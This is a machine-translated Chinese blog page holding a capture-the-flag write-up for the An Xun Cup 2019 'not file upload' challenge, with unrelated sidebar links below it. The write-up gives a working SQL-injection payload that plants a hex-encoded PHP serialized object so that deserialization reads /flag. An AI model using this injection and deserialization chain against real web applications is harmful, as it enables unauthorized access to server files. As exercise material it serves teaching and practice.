当前位置:网站首页>[an Xun cup 2019] not file upload
[an Xun cup 2019] not file upload
2022-07-05 03:38:00 【paidx0】
buu Gave the source code link , Go to the source code directly
Take a brief look at , It means uploading pictures , If helper Save pictures in serialized form , So in show Can be deserialized
<?php
class helper {
protected $ifview = True;
protected $config = "/flag";
}
$a = new helper();
echo serialize($a);
//O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}
Then because the variable attribute is protected You need to add... Before the variable name \x00*\x00 Variable name ,private Is to add \x00 Class name \x00 Variable name
$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
$attr = unserialize($attr_temp);
So I use \0\0\0 To fill in ,show It will be replaced before deserialization
//O:6:"helper":2:{s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}
SQL sentence
INSERT INTO images (implode(",",$sql_fields)) VALUES(implode(",",$sql_val))
$sql_fields[] = "`".$key_temp."`";
$sql_val[] = "'".$value_temp."'";
title,fileame,ext,path,attr
//title This is controllable , Single quote closure
//0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d
1','2','3','4',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d)#.jpg
边栏推荐
- [groovy] groovy environment setup (download groovy | install groovy | configure groovy environment variables)
- This + closure + scope interview question
- Flex flexible layout
- Three line by line explanations of the source code of anchor free series network yolox (a total of ten articles, which are guaranteed to be explained line by line. After reading it, you can change the
- Use of kubesphere configuration set (configmap)
- 【软件逆向-基础知识】分析方法、汇编指令体系结构
- Blue Bridge Cup single chip microcomputer -- PWM pulse width modulation
- How rem is used
- Talk about the SQL server version of DTM sub transaction barrier function
- v-if VS v-show 2.0
猜你喜欢
Linux Installation redis
单项框 复选框
Some enterprise interview questions of unity interview
[安洵杯 2019]不是文件上传
How to define a unified response object gracefully
Devtools的簡單使用
This + closure + scope interview question
De debugging (set the main thread as hidden debugging to destroy the debugging Channel & debugger detection)
[wp][入门]刷弱类型题目
Basic knowledge of tuples
随机推荐
【软件逆向-基础知识】分析方法、汇编指令体系结构
The latest blind box mall, which has been repaired very popular these days, has complete open source operation source code
51 independent key basic experiment
Linux Installation redis
Easy processing of ten-year futures and stock market data -- Application of tdengine in Tongxinyuan fund
Yuancosmic ecological panorama [2022 latest]
Unity implements the code of the attacked white flash (including shader)
英语必备词汇3400
Anti debugging (basic principles of debugger Design & NT NP and other anti debugging principles)
Talk about the SQL server version of DTM sub transaction barrier function
[groovy] groovy environment setup (download groovy | install groovy | configure groovy environment variables)
[groovy] string (string splicing | multi line string)
The perfect car for successful people: BMW X7! Superior performance, excellent comfort and safety
Kbp206-asemi rectifier bridge kbp206
Sqoop command
Ubantu disk expansion (VMware)
Leetcode92. reverse linked list II
NPM introduction link symbolic link
腾讯云,实现图片上传
深度学习——LSTM基础